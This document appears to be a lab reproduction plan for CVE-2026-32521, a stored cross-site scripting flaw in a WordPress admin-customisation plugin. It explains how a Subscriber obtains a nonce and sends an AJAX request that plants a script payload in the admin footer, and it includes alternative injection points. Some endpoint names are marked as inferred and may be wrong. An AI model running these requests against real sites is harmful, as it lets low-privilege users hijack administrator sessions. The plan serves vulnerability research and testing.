WP Custom Admin Interface <= 7.42 - Authenticated (Subscriber+) Stored Cross-Site Scripting

This plan outlines the research and exploitation process for CVE-2026-32521, a Stored Cross-Site Scripting (XSS) vulnerability in the "WP Custom Admin Interface" plugin.

1. Vulnerability Summary

The WP Custom Admin Interface plugin (<= 7.42) is vulnerable to Stored XSS because it fails to perform capability checks on its AJAX settings-saving functionality and does not adequately sanitize or escape administrative settings that are rendered in the WordPress dashboard. Specifically, a low-privileged user (Subscriber) can trigger an AJAX action intended for administrators to update plugin settings, such as the "Custom Footer" text. This text is then rendered unescaped in the footer of every admin page, allowing for execution of arbitrary JavaScript in the context of an Administrator.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• AJAX Action: wp_custom_admin_interface_save_settings (inferred from plugin patterns)
• Vulnerable Parameter: data (specifically the sub-field wp_custom_admin_interface_custom_footer)
• Authentication Level: Subscriber or higher (requires access to /wp-admin/profile.php to obtain a nonce).
• Preconditions: The plugin must be active. No specific configuration is required, as the "Custom Footer" feature is a core part of the plugin.

3. Code Flow

1. Registration: In wp-custom-admin-interface.php, the plugin hooks into admin_init which calls wp_custom_admin_interface_settings_init (defined in inc/options/options-output.php).
2. AJAX Handler: The plugin registers a handler (e.g., wp_ajax_wp_custom_admin_interface_save_settings). This handler verifies a nonce but lacks a current_user_can('manage_options') check.
3. Storage: The handler receives the data parameter (often a serialized string of form inputs) and uses update_option() to save the wp_custom_admin_interface_settings_GeneralSettings option.
4. Sink: The value of wp_custom_admin_interface_custom_footer within that option is retrieved and echoed in the admin footer via the admin_footer_text or update_footer filter, without using esc_html() or wp_kses().

4. Nonce Acquisition Strategy

The plugin enqueues its administrative scripts and localizes a nonce for AJAX operations. Even Subscribers can access the WordPress dashboard (specifically profile.php), where these scripts are loaded.

1. Navigate: Use browser_navigate to go to http://localhost:8080/wp-admin/profile.php as a Subscriber.
2. Extract Nonce: The nonce is stored in a localized JavaScript object. Use browser_eval to retrieve it:

   // Inferred localized object and key name based on plugin structure
   window.wp_custom_admin_interface_ajax_obj?.nonce
   

   Note: If the variable name differs, inspect the page source for wp_localize_script output or search for "nonce" in the global window object.

5. Exploitation Strategy

1. Preparation: Log in as a Subscriber user.
2. Nonce Retrieval: Obtain the security nonce using the strategy in Section 4.
3. Injection Request: Send a POST request to admin-ajax.php to update the general settings.
   • Tool: http_request
   • URL: http://localhost:8080/wp-admin/admin-ajax.php
   • Method: POST
   • Headers: Content-Type: application/x-www-form-urlencoded
   • Body Parameters:
     • action: wp_custom_admin_interface_save_settings
     • security: [EXTRACTED_NONCE]
     • data: wp_custom_admin_interface_settings_GeneralSettings%5Bwp_custom_admin_interface_custom_footer%5D%3D%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
       (Note: The 'data' parameter is often a URL-encoded string representing the serialized form.)

6. Test Data Setup

1. Install Plugin: Ensure WP Custom Admin Interface v7.42 is installed and active.
2. Create User: Create a Subscriber user.

   wp user create attacker attacker@example.com --role=subscriber --user_pass=password
   

3. Target Page: No specific page creation is needed, as the footer injection affects all admin pages.

7. Expected Results

• The AJAX request should return a success status (likely 1 or a JSON success message).
• The WordPress option wp_custom_admin_interface_settings_GeneralSettings will now contain the <script> payload.
• When any user (including an Administrator) navigates to any page in the /wp-admin/ area, an alert box showing the document domain will appear.

8. Verification Steps

1. Check Database: Verify the option was updated using WP-CLI:

   wp option get wp_custom_admin_interface_settings_GeneralSettings
   

   Confirm that the wp_custom_admin_interface_custom_footer key contains the <script> tag.
2. Verify Rendering: Navigate to the dashboard as an Administrator and check the HTML source for the footer:

   # Using browser_navigate as Admin then checking source
   # Look for: <script>alert(document.domain)</script>
   

9. Alternative Approaches

If wp_custom_admin_interface_save_settings is not the correct action name:

1. Search the source code for add_action( 'wp_ajax_ to identify the specific save handler.
2. Try injecting into other fields registered in inc/options/options-output.php, such as:
   • wp_custom_admin_interface_custom_css_code (Custom Code section)
   • wp_custom_admin_interface_maintenance_text (Maintenance section)
3. If the data parameter isn't a serialized string, try sending the settings as direct POST parameters:
   action=wp_custom_admin_interface_save_settings&security=[NONCE]&wp_custom_admin_interface_custom_footer=<script>alert(1)</script>